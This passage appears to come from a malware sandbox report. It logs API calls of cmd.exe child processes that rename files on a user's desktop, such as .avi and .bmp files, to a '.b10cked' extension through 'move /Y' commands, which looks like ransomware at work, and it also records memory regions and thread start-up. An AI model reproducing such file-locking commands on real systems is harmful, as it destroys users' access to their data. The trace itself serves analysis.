"c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.945] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef9bc | out: lpFindFileData=0x2ef9bc) returned 0x4a0058 [0231.946] FindClose (in: hFindFile=0x4a0058 | out: hFindFile=0x4a0058) returned 1 [0231.946] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef9bc | out: lpFindFileData=0x2ef9bc) returned 0x4a0058 [0231.946] FindClose (in: hFindFile=0x4a0058 | out: hFindFile=0x4a0058) returned 1 [0231.946] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef9bc | out: lpFindFileData=0x2ef9bc) returned 0x4a0058 [0231.946] FindClose (in: hFindFile=0x4a0058 | out: hFindFile=0x4a0058) returned 1 [0231.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.946] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.946] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.946] GetEnvironmentStringsW () returned 0x4a2b38* [0231.946] FreeEnvironmentStringsW (penv=0x4a2b38) returned 1 [0231.947] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.947] GetConsoleOutputCP () returned 0x1b5 [0231.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.978] GetUserDefaultLCID () returned 0x409 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efd80, cchData=128 | out: lpLCData="0") returned 2 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efd80, cchData=128 | out: lpLCData="0") returned 2 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efd80, cchData=128 | out: lpLCData="1") returned 2 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.985] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.986] GetConsoleTitleW (in: lpConsoleTitle=0x490910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.010] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.010] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.011] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.011] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.012] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.012] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.012] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.012] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.012] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.012] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.012] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.016] GetConsoleTitleW (in: lpConsoleTitle=0x2efa78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.072] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.072] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.072] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.072] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.072] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.072] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.072] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.072] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.072] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.072] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.072] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.072] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.072] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.072] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.072] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.072] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.072] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.073] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.073] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.073] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.073] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.073] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.073] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.073] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.073] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.073] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.073] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.073] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.073] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.073] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.073] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.073] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.073] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.073] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.073] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.077] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.077] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.077] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef834, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef82c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef82c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.079] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.079] _wcsicmp (_String1="OXP9RC~1.AVI", _String2=".") returned 65 [0232.079] _wcsicmp (_String1="OXP9RC~1.AVI", _String2="..") returned 65 [0232.080] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rc~1.avi")) returned 0x20 [0232.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1eb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.080] SetErrorMode (uMode=0x0) returned 0x0 [0232.080] SetErrorMode (uMode=0x1) returned 0x0 [0232.080] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", nBufferLength=0x104, lpBuffer=0x2ef1bc, lpFilePart=0x2ef1a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", lpFilePart=0x2ef1a4*="OXP9RC~1.AVI") returned 0x33 [0232.080] SetErrorMode (uMode=0x0) returned 0x1 [0232.080] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x12 [0232.080] _wcsicmp (_String1="OXP9RC~1.AVI", _String2=".") returned 65 [0232.080] _wcsicmp (_String1="OXP9RC~1.AVI", _String2="..") returned 65 [0232.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rc~1.avi")) returned 0x20 [0232.081] SetErrorMode (uMode=0x0) returned 0x0 [0232.081] SetErrorMode (uMode=0x1) returned 0x0 [0232.081] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", nBufferLength=0x104, lpBuffer=0x2ef638, lpFilePart=0x2ef3d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", lpFilePart=0x2ef3d0*="OXP9RC~1.AVI") returned 0x33 [0232.081] SetErrorMode (uMode=0x0) returned 0x1 [0232.081] SetErrorMode (uMode=0x0) returned 0x0 [0232.081] SetErrorMode (uMode=0x1) returned 0x0 [0232.081] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked", nBufferLength=0x104, lpBuffer=0x2ef840, lpFilePart=0x2ef3d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked", lpFilePart=0x2ef3d0*="OXP9rCEqmjhd9gNfz.avi.b10cked") returned 0x44 [0232.081] SetErrorMode (uMode=0x0) returned 0x1 [0232.081] SetLastError (dwErrCode=0x0) [0232.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi.b10cked")) returned 0xffffffff [0232.081] GetLastError () returned 0x2 [0232.081] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", fInfoLevelId=0x1, lpFindFileData=0x2eed4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eed4c) returned 0x490f30 [0232.081] FindNextFileW (in: hFindFile=0x490f30, lpFindFileData=0x2eed4c | out: lpFindFileData=0x2eed4c) returned 0 [0232.082] GetLastError () returned 0x12 [0232.082] FindClose (in: hFindFile=0x490f30 | out: hFindFile=0x490f30) returned 1 [0232.084] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", fInfoLevelId=0x1, lpFindFileData=0x4a1c58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4a1c58) returned 0x490f30 [0232.084] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked", nBufferLength=0x104, lpBuffer=0x2eefe4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked", lpFilePart=0x0) returned 0x44 [0232.084] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi", nBufferLength=0x104, lpBuffer=0x2eefe4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi", lpFilePart=0x0) returned 0x3c [0232.084] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi")) returned 0x20 [0232.084] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi.b10cked"), dwFlags=0x3) returned 1 [0232.085] FindClose (in: hFindFile=0x490f30 | out: hFindFile=0x490f30) returned 1 [0232.085] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eef98 | out: _Buffer=" 1") returned 9 [0232.085] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.085] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef24 | out: lpMode=0x2eef24) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eef58 | out: lpConsoleScreenBufferInfo=0x2eef58) returned 1 [0232.147] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.147] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eef98 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.147] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eef7c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eef7c*=0x1a) returned 1 [0232.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.149] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.191] exit (_Code=0) Process: id = "609" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34365 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34366 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34367 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34368 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34369 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34370 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34371 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34372 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34373 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34374 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34519 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34520 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34521 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34522 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 34523 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 34524 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34525 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34526 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34527 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34528 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34529 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34530 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34531 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34532 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34533 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 34534 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34535 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34536 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34537 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34538 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34539 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34540 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 34541 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 34542 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 847 os_tid = 0x42c [0231.543] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f904 | out: lpSystemTimeAsFileTime=0x18f904*(dwLowDateTime=0xbd8fbec0, dwHighDateTime=0x1d440a9)) [0231.543] GetCurrentProcessId () returned 0x308 [0231.543] GetCurrentThreadId () returned 0x42c [0231.543] GetTickCount () returned 0x3fb8d [0231.543] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8fc | out: lpPerformanceCount=0x18f8fc*=28833257457) returned 1 [0231.544] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.544] __set_app_type (_Type=0x1) [0231.544] __p__fmode () returned 0x76b331f4 [0231.544] __p__commode () returned 0x76b331fc [0231.544] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.545] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.545] GetCurrentThreadId () returned 0x42c [0231.545] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x42c) returned 0x38 [0231.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.545] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.545] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.545] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.545] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f894 | out: phkResult=0x18f894*=0x0) returned 0x2 [0231.545] VirtualQuery (in: lpAddress=0x18f8cb, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.545] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c 